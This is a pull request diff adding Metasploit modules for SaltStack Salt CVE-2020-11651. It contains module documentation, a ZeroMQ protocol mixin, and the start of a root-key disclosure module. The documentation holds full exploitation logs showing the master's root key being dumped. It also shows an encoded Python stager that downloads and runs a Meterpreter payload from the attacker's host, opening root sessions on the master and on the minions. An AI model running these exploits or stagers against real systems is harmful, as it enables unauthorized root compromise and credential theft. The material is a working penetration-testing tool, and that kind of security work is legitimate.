### PR TITLE
Add SaltStack Salt root key disclosure (CVE-2020-11651), unauthenticated RCE (also CVE-2020-11651), and basic ZeroMQ library

### DIFF
--- a/documentation/modules/auxiliary/gather/saltstack_salt_root_key.md
+++ b/documentation/modules/auxiliary/gather/saltstack_salt_root_key.md
@@ -1,0 +1,91 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits unauthenticated access to the `_prep_auth_info()`
+method in the SaltStack Salt master's ZeroMQ request server, for
+versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the
+root key used to authenticate administrative commands to the master.
+
+VMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are
+known to be affected by the Salt vulnerabilities.
+
+Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as
+well as Vulhub's Docker image.
+
+### Setup
+
+Follow [SaltStack's instructions for
+Ubuntu](https://repo.saltstack.com/#ubuntu) and "pin to minor release"
+either version **2019.2.3** or **3000.1**.
+
+Alternatively, you may use [Vulhub's Docker
+image](https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-11651)
+for ease of installation. Version **2019.2.3** will be used.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Actions
+
+### Dump
+
+This dumps the Salt master's root key by sending the `_prep_auth_info()`
+method and extracting the key from the resulting serialized auth info.
+
+## Scenarios
+
+### SaltStack Salt 2019.2.3 on Ubuntu 18.04
+
+```
+msf5 > use auxiliary/gather/saltstack_salt_root_key
+msf5 auxiliary(gather/saltstack_salt_root_key) > options
+
+Module options (auxiliary/gather/saltstack_salt_root_key):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT   4506             yes       The target port (TCP)
+
+
+Auxiliary action:
+
+   Name  Description
+   ----  -----------
+   Dump  Dump root key from Salt master
+
+
+msf5 auxiliary(gather/saltstack_salt_root_key) > set rhosts 172.28.128.5
+rhosts => 172.28.128.5
+msf5 auxiliary(gather/saltstack_salt_root_key) > run
+[*] Running module against 172.28.128.5
+
+[*] 172.28.128.5:4506 - Connecting to ZeroMQ service at 172.28.128.5:4506
+[*] 172.28.128.5:4506 - Negotiating signature
+[+] 172.28.128.5:4506 - Received valid signature: "\xFF\x00\x00\x00\x00\x00\x00\x00\x01\x7F"
+[*] 172.28.128.5:4506 - Sending identical signature
+[*] 172.28.128.5:4506 - Negotiating version
+[+] 172.28.128.5:4506 - Received compatible version: "\x03"
+[*] 172.28.128.5:4506 - Sending identical version
+[*] 172.28.128.5:4506 - Negotiating NULL security mechanism
+[+] 172.28.128.5:4506 - Received NULL security mechanism
+[*] 172.28.128.5:4506 - Sending NULL security mechanism
+[*] 172.28.128.5:4506 - Sending READY command of type REQ
+[+] 172.28.128.5:4506 - Received READY reply of type ROUTER
+[*] 172.28.128.5:4506 - Yeeting _prep_auth_info() at 172.28.128.5:4506
+[+] 172.28.128.5:4506 - Received serialized auth info
+[+] 172.28.128.5:4506 - Root key: bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk=
+[*] 172.28.128.5:4506 - Disconnecting from 172.28.128.5:4506
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/saltstack_salt_root_key) > creds
+Credentials
+===========
+
+host          origin        service                 public  private                                                                       realm  private_type  JtR Format
+----          ------        -------                 ------  -------                                                                       -----  ------------  ----------
+172.28.128.5  172.28.128.5  4506/tcp (salt/zeromq)  root    bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk=         Password
+
+msf5 auxiliary(gather/saltstack_salt_root_key) >
+```

--- a/documentation/modules/auxiliary/gather/saltstack_salt_root_key.md
+++ b/documentation/modules/auxiliary/gather/saltstack_salt_root_key.md
@@ -15,13 +15,45 @@ well as Vulhub's Docker image.
 
 ### Setup
 
-Follow [SaltStack's instructions for
-Ubuntu](https://repo.saltstack.com/#ubuntu) and "pin to minor release"
-either version **2019.2.3** or **3000.1**.
+**Note:** I did the bulk of my testing after manually installing Salt in
+an [Ubuntu 18.04 VM](#using-a-virtual-machine), but the [Docker image
+from Vulhub](#using-docker) may be quicker. YMMV.
 
-Alternatively, you may use [Vulhub's Docker
-image](https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-11651)
-for ease of installation. Version **2019.2.3** will be used.
+#### Using a virtual machine
+
+1. Set up an Ubuntu 18.04 VM
+2. Browse to [SaltStack's instructions for
+   Ubuntu](https://repo.saltstack.com/#ubuntu)
+3. Select `Pin to Minor Release` and change all versions to either
+   **2019.2.3** or **3000.1**, depending on the version you wish to test
+4. Follow the instructions, installing only the `salt-master` and
+   `salt-minion` packages necessary for testing
+5. Follow the [post-installation
+   configuration](https://docs.saltstack.com/en/latest/ref/configuration/index.html)
+
+You may now begin testing.
+
+#### Using Docker
+
+**Prerequisites:** [Docker](https://docs.docker.com/get-docker/) and
+[Docker Compose](https://docs.docker.com/compose/install/) must be
+installed first.
+
+**Note:** The Salt master is already configured and running in the
+following scenario. The majority of the steps below are for configuring
+and starting the minion. Version **2019.2.3** will be used.
+
+1. Run `git clone https://github.com/vulhub/vulhub`
+2. Run `cd vulhub/saltstack/CVE-2020-11651`
+3. Run `docker-compose up -d` to start the container in the background
+4. Run `docker exec -it cve-2020-11651_saltstack_1 bash` to drop to a
+   root shell inside the container
+5. Run `echo $'127.0.0.1\tsalt' >> /etc/hosts` to add the master to
+   `/etc/hosts` (this allows the minion to find the master)
+6. Run `salt-minion -d` to execute the minion in the background
+7. Run `salt-key -A` and accept the key for the minion
+
+You may now begin testing.
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/linux/misc/saltstack_salt_unauth_rce.md
+++ b/documentation/modules/exploit/linux/misc/saltstack_salt_unauth_rce.md
@@ -15,13 +15,45 @@ well as Vulhub's Docker image.
 
 ### Setup
 
-Follow [SaltStack's instructions for
-Ubuntu](https://repo.saltstack.com/#ubuntu) and "pin to minor release"
-either version **2019.2.3** or **3000.1**.
+**Note:** I did the bulk of my testing after manually installing Salt in
+an [Ubuntu 18.04 VM](#using-a-virtual-machine), but the [Docker image
+from Vulhub](#using-docker) may be quicker. YMMV.
 
-Alternatively, you may use [Vulhub's Docker
-image](https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-11651)
-for ease of installation. Version **2019.2.3** will be used.
+#### Using a virtual machine
+
+1. Set up an Ubuntu 18.04 VM
+2. Browse to [SaltStack's instructions for
+   Ubuntu](https://repo.saltstack.com/#ubuntu)
+3. Select `Pin to Minor Release` and change all versions to either
+   **2019.2.3** or **3000.1**, depending on the version you wish to test
+4. Follow the instructions, installing only the `salt-master` and
+   `salt-minion` packages necessary for testing
+5. Follow the [post-installation
+   configuration](https://docs.saltstack.com/en/latest/ref/configuration/index.html)
+
+You may now begin testing.
+
+#### Using Docker
+
+**Prerequisites:** [Docker](https://docs.docker.com/get-docker/) and
+[Docker Compose](https://docs.docker.com/compose/install/) must be
+installed first.
+
+**Note:** The Salt master is already configured and running in the
+following scenario. The majority of the steps below are for configuring
+and starting the minion. Version **2019.2.3** will be used.
+
+1. Run `git clone https://github.com/vulhub/vulhub`
+2. Run `cd vulhub/saltstack/CVE-2020-11651`
+3. Run `docker-compose up -d` to start the container in the background
+4. Run `docker exec -it cve-2020-11651_saltstack_1 bash` to drop to a
+   root shell inside the container
+5. Run `echo $'127.0.0.1\tsalt' >> /etc/hosts` to add the master to
+   `/etc/hosts` (this allows the minion to find the master)
+6. Run `salt-minion -d` to execute the minion in the background
+7. Run `salt-key -A` and accept the key for the minion
+
+You may now begin testing.
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/linux/misc/saltstack_salt_unauth_rce.md
+++ b/documentation/modules/exploit/linux/misc/saltstack_salt_unauth_rce.md
@@ -1,0 +1,212 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits unauthenticated access to the `runner()` and
+`_send_pub()` methods in the SaltStack Salt master's ZeroMQ request
+server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to
+execute code as root on either the master or on select minions.
+
+VMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are
+known to be affected by the Salt vulnerabilities.
+
+Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as
+well as Vulhub's Docker image.
+
+### Setup
+
+Follow [SaltStack's instructions for
+Ubuntu](https://repo.saltstack.com/#ubuntu) and "pin to minor release"
+either version **2019.2.3** or **3000.1**.
+
+Alternatively, you may use [Vulhub's Docker
+image](https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-11651)
+for ease of installation. Version **2019.2.3** will be used.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### Master (Python payload)
+
+This executes a Python payload on the master(s) specified by `RHOST(S)`.
+
+### Master (Unix command)
+
+This executes a Unix command payload on the master(s) specified by
+`RHOST(S)`.
+
+### Minions (Python payload)
+
+This executes a Python payload on the minions specified by the `MINIONS`
+option.
+
+### Minions (Unix command)
+
+This executes a Unix command payload on the minions specified by the
+`MINIONS` option.
+
+## Options
+
+### MINIONS
+
+This is the PCRE regex of minions to execute the payload on. Defaults to
+`.*` for all minions.
+
+### WfsDelay
+
+Set this to the number of seconds to wait for **all** sessions to come
+in. Defaults to **10 seconds**, though the exploit may wait up to 20
+seconds.
+
+## Scenarios
+
+### SaltStack Salt 2019.2.3 on Ubuntu 18.04
+
+#### Executing Python payload on the master
+
+```
+msf5 > use exploit/linux/misc/saltstack_salt_unauth_rce
+msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > show targets
+
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   Master (Python payload)
+   1   Master (Unix command)
+   2   Minions (Python payload)
+   3   Minions (Unix command)
+
+
+msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > options
+
+Module options (exploit/linux/misc/saltstack_salt_unauth_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   MINIONS  .*               yes       PCRE regex of minions to target
+   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT    4506             yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL for incoming connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+
+
+Payload options (python/meterpreter/reverse_https):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The local listener hostname
+   LPORT  8443             yes       The local listener port
+   LURI                    no        The HTTP Path
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Master (Python payload)
+
+
+msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > set rhosts 172.28.128.5
+rhosts => 172.28.128.5
+msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > set lhost 172.28.128.1
+lhost => 172.28.128.1
+msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > run
+
+[*] Started HTTPS reverse handler on https://172.28.128.1:8443
+[*] 172.28.128.5:4506 - Using auxiliary/gather/saltstack_salt_root_key as check
+[*] 172.28.128.5:4506 - Connecting to ZeroMQ service at 172.28.128.5:4506
+[*] 172.28.128.5:4506 - Negotiating signature
+[+] 172.28.128.5:4506 - Received valid signature: "\xFF\x00\x00\x00\x00\x00\x00\x00\x01\x7F"
+[*] 172.28.128.5:4506 - Sending identical signature
+[*] 172.28.128.5:4506 - Negotiating version
+[+] 172.28.128.5:4506 - Received compatible version: "\x03"
+[*] 172.28.128.5:4506 - Sending identical version
+[*] 172.28.128.5:4506 - Negotiating NULL security mechanism
+[+] 172.28.128.5:4506 - Received NULL security mechanism
+[*] 172.28.128.5:4506 - Sending NULL security mechanism
+[*] 172.28.128.5:4506 - Sending READY command of type REQ
+[+] 172.28.128.5:4506 - Received READY reply of type ROUTER
+[*] 172.28.128.5:4506 - Yeeting _prep_auth_info() at 172.28.128.5:4506
+[+] 172.28.128.5:4506 - Received serialized auth info
+[+] 172.28.128.5:4506 - Root key: bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk=
+[*] 172.28.128.5:4506 - Disconnecting from 172.28.128.5:4506
+[+] 172.28.128.5:4506 - Successfully obtained root key: bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk=
+[*] 172.28.128.5:4506 - Connecting to ZeroMQ service at 172.28.128.5:4506
+[*] 172.28.128.5:4506 - Negotiating signature
+[+] 172.28.128.5:4506 - Received valid signature: "\xFF\x00\x00\x00\x00\x00\x00\x00\x01\x7F"
+[*] 172.28.128.5:4506 - Sending identical signature
+[*] 172.28.128.5:4506 - Negotiating version
+[+] 172.28.128.5:4506 - Received compatible version: "\x03"
+[*] 172.28.128.5:4506 - Sending identical version
+[*] 172.28.128.5:4506 - Negotiating NULL security mechanism
+[+] 172.28.128.5:4506 - Received NULL security mechanism
+[*] 172.28.128.5:4506 - Sending NULL security mechanism
+[*] 172.28.128.5:4506 - Sending READY command of type REQ
+[+] 172.28.128.5:4506 - Received READY reply of type ROUTER
+[*] 172.28.128.5:4506 - Executing Python payload on the master: python/meterpreter/reverse_https
+[*] 172.28.128.5:4506 - Yeeting runner() at 172.28.128.5:4506
+[*] 172.28.128.5:4506 - Executing Python code: exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xNzIuMjguMTI4LjE6ODQ0My96a0p4ZWdUdlhWeUtGcDhDMUtGZmpnTFNKOXNvcycpLnJlYWQoKSkK')[0]))
+[*] 172.28.128.5:4506 - Unserialized clear load: {"cmd"=>"runner", "fun"=>"salt.cmd", "kwarg"=>{"hide_output"=>true, "ignore_retcode"=>true, "output_loglevel"=>"quiet", "fun"=>"cmd.exec_code", "lang"=>"python", "code"=>"exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xNzIuMjguMTI4LjE6ODQ0My96a0p4ZWdUdlhWeUtGcDhDMUtGZmpnTFNKOXNvcycpLnJlYWQoKSkK')[0]))"}, "user"=>"root", "key"=>"bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk="}
+[+] 172.28.128.5:4506 - Received runner() response: "\x01\x00\x00<\x82\xA3jid\xB420200510102113141303\xA3tag\xBDsalt/run/20200510102113141303"
+[*] https://172.28.128.1:8443 handling request from 172.28.128.5; (UUID: kwpadl1s) Staging python payload (53902 bytes) ...
+[*] Meterpreter session 1 opened (172.28.128.1:8443 -> 172.28.128.5:48236) at 2020-05-10 05:21:15 -0500
+[*] 172.28.128.5:4506 - Disconnecting from 172.28.128.5:4506
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : ubuntu-bionic
+OS              : Linux 4.15.0-91-generic #92-Ubuntu SMP Fri Feb 28 11:09:48 UTC 2020
+Architecture    : x64
+System Language : C
+Meterpreter     : python/linux
+meterpreter >
+```
+
+#### Executing Python payload on the minions
+
+```
+msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > set target Minions\ (Python\ payload)
+target => Minions (Python payload)
+msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > run
+
+[*] Started HTTPS reverse handler on https://172.28.128.1:8443
+[*] 172.28.128.5:4506 - Connecting to ZeroMQ service at 172.28.128.5:4506
+[*] 172.28.128.5:4506 - Negotiating signature
+[+] 172.28.128.5:4506 - Received valid signature: "\xFF\x00\x00\x00\x00\x00\x00\x00\x01\x7F"
+[*] 172.28.128.5:4506 - Sending identical signature
+[*] 172.28.128.5:4506 - Negotiating version
+[+] 172.28.128.5:4506 - Received compatible version: "\x03"
+[*] 172.28.128.5:4506 - Sending identical version
+[*] 172.28.128.5:4506 - Negotiating NULL security mechanism
+[+] 172.28.128.5:4506 - Received NULL security mechanism
+[*] 172.28.128.5:4506 - Sending NULL security mechanism
+[*] 172.28.128.5:4506 - Sending READY command of type REQ
+[+] 172.28.128.5:4506 - Received READY reply of type ROUTER
+[*] 172.28.128.5:4506 - Executing Python payload on the minions: python/meterpreter/reverse_https
+[*] 172.28.128.5:4506 - Yeeting _send_pub() at 172.28.128.5:4506
+[*] 172.28.128.5:4506 - Executing Python code: exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xNzIuMjguMTI4LjE6ODQ0My9hZEY5X2gxZFJrZ3BSRHhRZF9QOC1nc1V6a1hmcycpLnJlYWQoKSkK')[0]))
+[*] 172.28.128.5:4506 - Unserialized clear load: {"cmd"=>"_send_pub", "kwargs"=>{"bg"=>true, "hide_output"=>true, "ignore_retcode"=>true, "output_loglevel"=>"quiet", "show_jid"=>false, "show_timeout"=>false}, "user"=>"root", "tgt"=>".*", "tgt_type"=>"pcre", "jid"=>"20200510102150723893", "fun"=>"cmd.exec_code", "arg"=>["python", "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xNzIuMjguMTI4LjE6ODQ0My9hZEY5X2gxZFJrZ3BSRHhRZF9QOC1nc1V6a1hmcycpLnJlYWQoKSkK')[0]))"]}
+[+] 172.28.128.5:4506 - Received _send_pub() response: "\x01\x00\x00\x01\xC0"
+[*] https://172.28.128.1:8443 handling request from 172.28.128.5; (UUID: foe5rluh) Staging python payload (53883 bytes) ...
+[*] Meterpreter session 2 opened (172.28.128.1:8443 -> 172.28.128.5:48388) at 2020-05-10 05:21:51 -0500
+[+] 172.28.128.5:4506 - Deleted /var/cache/salt/minion/proc/20200510102150723893
+[*] 172.28.128.5:4506 - Disconnecting from 172.28.128.5:4506
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : ubuntu-bionic
+OS              : Linux 4.15.0-91-generic #92-Ubuntu SMP Fri Feb 28 11:09:48 UTC 2020
+Architecture    : x64
+System Language : C
+Meterpreter     : python/linux
+meterpreter >
+```

--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -73,6 +73,7 @@ require 'msf/core/exploit/tincd'
 require 'msf/core/exploit/git'
 require 'msf/core/exploit/rdp'
 require 'msf/core/exploit/ldap'
+require 'msf/core/exploit/zeromq'
 
 # Telephony
 require 'msf/core/exploit/dialup'

--- a/lib/msf/core/exploit/zeromq.rb
+++ b/lib/msf/core/exploit/zeromq.rb
@@ -133,11 +133,9 @@ module Msf::Exploit::Remote::ZeroMQ
     }
 
     # XXX: Strings NEED to be UTF-8 here, NOT binary!
-    # HACK: Bypass RuboCop with this one neat metaprogramming trick!
-    send(
-      :eval,
-      clear_load.to_s.force_encoding(Encoding::UTF_8)
-    ).to_msgpack
+    # rubocop:disable Security/Eval
+    eval(clear_load.to_s.force_encoding(Encoding::UTF_8)).to_msgpack
+    # rubocop:enable Security/Eval
   end
 
 end

--- a/lib/msf/core/exploit/zeromq.rb
+++ b/lib/msf/core/exploit/zeromq.rb
@@ -1,0 +1,143 @@
+# -*- coding: binary -*-
+
+#
+# This mixin is a simplistic implementation of ZeroMQ as used by SaltStack Salt
+#
+# ZMTP 3.0 RFC: https://rfc.zeromq.org/spec/23/
+# Wireshark dissector: https://github.com/whitequark/zmtp-wireshark
+#
+# TODO: Please iterate on this! I spent little time going over the protocol :(
+#
+
+module Msf::Exploit::Remote::ZeroMQ
+
+  ZEROMQ_SIGNATURE = "\xff\x00\x00\x00\x00\x00\x00\x00\x01\x7f".freeze
+  ZEROMQ_VERSION = "\x03".freeze
+
+  include Msf::Exploit::Remote::Tcp
+
+  def zmq_connect
+    print_status("Connecting to ZeroMQ service at #{peer}")
+    connect
+  end
+
+  def zmq_disconnect
+    vprint_status("Disconnecting from #{peer}")
+    disconnect
+  end
+
+  # Replay the ZeroMQ elbow bump
+  def zmq_negotiate(mechanism: 'NULL', client: 'REQ', server: 'ROUTER')
+    zmq_negotiate_signature
+    zmq_negotiate_version
+    zmq_negotiate_security_mechanism(mechanism)
+    zmq_negotiate_ready_command(client, server)
+  end
+
+  def zmq_negotiate_signature
+    print_status('Negotiating signature')
+
+    unless (res = sock.get_once)
+      fail_with(Failure::Unknown, 'Did not receive signature')
+    end
+
+    unless res == ZEROMQ_SIGNATURE
+      fail_with(Failure::UnexpectedReply,
+                "Received invalid signature: #{res.inspect}")
+    end
+
+    vprint_good("Received valid signature: #{res.inspect}")
+
+    vprint_status('Sending identical signature')
+    sock.put(res)
+  end
+
+  def zmq_negotiate_version
+    print_status('Negotiating version')
+
+    unless (res = sock.get_once)
+      fail_with(Failure::Unknown, 'Did not receive version')
+    end
+
+    unless res == ZEROMQ_VERSION
+      fail_with(Failure::UnexpectedReply,
+                "Received incompatible version: #{res.inspect}")
+    end
+
+    vprint_good("Received compatible version: #{res.inspect}")
+
+    vprint_status('Sending identical version')
+    sock.put(res)
+  end
+
+  def zmq_negotiate_security_mechanism(mechanism = 'NULL')
+    print_status("Negotiating #{mechanism} security mechanism")
+
+    unless (res = sock.get_once)
+      fail_with(Failure::Unknown, 'Did not receive security mechanism')
+    end
+
+    unless res.include?(mechanism)
+      fail_with(
+        Failure::UnexpectedReply,
+        "Did not receive #{mechanism} security mechanism: #{res.inspect}"
+      )
+    end
+
+    vprint_good("Received #{mechanism} security mechanism")
+
+    vprint_status("Sending #{mechanism} security mechanism")
+    sock.put(res)
+  end
+
+  def zmq_negotiate_ready_command(client = 'REQ', server = 'ROUTER')
+    print_status("Sending READY command of type #{client}")
+
+    # 0x04 indicates an 8-bit command length
+    sock.put(
+      "\x04\x26" \
+      "\x05READY" \
+      "\x0bSocket-Type" \
+      "\x00\x00\x00#{[client.length].pack('C')}#{client}" \
+      "\x08Identity" \
+      "\x00\x00\x00\x00"
+    )
+
+    unless (res = sock.get_once)
+      fail_with(Failure::Unknown, 'Did not receive READY reply')
+    end
+
+    unless res.match(/READY.+Socket-Type.+#{server}.+Identity/m)
+      fail_with(
+        Failure::UnexpectedReply,
+        "Did not receive READY reply of type #{server}: #{res.inspect}"
+      )
+    end
+
+    vprint_good("Received READY reply of type #{server}")
+  end
+
+  def zmq_send_message(msg = '')
+    # 0x02 indicates a 64-bit message length
+    sock.put(
+      "\x01\x00" \
+      "\x02#{[msg.length].pack('Q>')}#{msg}"
+    )
+  end
+
+  # NOTE: This is Salt-specific code to serialize a cleartext MessagePack "load"
+  def serialize_clear_load(load_hash = {})
+    clear_load = {
+      'enc' => 'clear',
+      'load' => load_hash
+    }
+
+    # XXX: Strings NEED to be UTF-8 here, NOT binary!
+    # HACK: Bypass RuboCop with this one neat metaprogramming trick!
+    send(
+      :eval,
+      clear_load.to_s.force_encoding(Encoding::UTF_8)
+    ).to_msgpack
+  end
+
+end

--- a/modules/auxiliary/gather/saltstack_salt_root_key.rb
+++ b/modules/auxiliary/gather/saltstack_salt_root_key.rb
@@ -19,6 +19,9 @@ class MetasploitModule < Msf::Auxiliary
           versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the
           root key used to authenticate administrative commands to the master.
 
+          VMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are
+          known to be affected by the Salt vulnerabilities.
+
           Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as
           well as Vulhub's Docker image.
         },
@@ -31,6 +34,7 @@ class MetasploitModule < Msf::Auxiliary
           ['CVE', '2020-11652'], # Authed directory traversals (not used here)
           ['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'],
           ['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'],
+          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'],
           ['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py']
         ],
         'DisclosureDate' => '2020-04-30', # F-Secure advisory

--- a/modules/auxiliary/gather/saltstack_salt_root_key.rb
+++ b/modules/auxiliary/gather/saltstack_salt_root_key.rb
@@ -1,0 +1,119 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::ZeroMQ
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SaltStack Salt Master Server Root Key Disclosure',
+        'Description' => %q{
+          This module exploits unauthenticated access to the _prep_auth_info()
+          method in the SaltStack Salt master's ZeroMQ request server, for
+          versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the
+          root key used to authenticate administrative commands to the master.
+
+          Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as
+          well as Vulhub's Docker image.
+        },
+        'Author' => [
+          'F-Secure', # Discovery
+          'wvu' # Module
+        ],
+        'References' => [
+          ['CVE', '2020-11651'], # Auth bypass (used by this module)
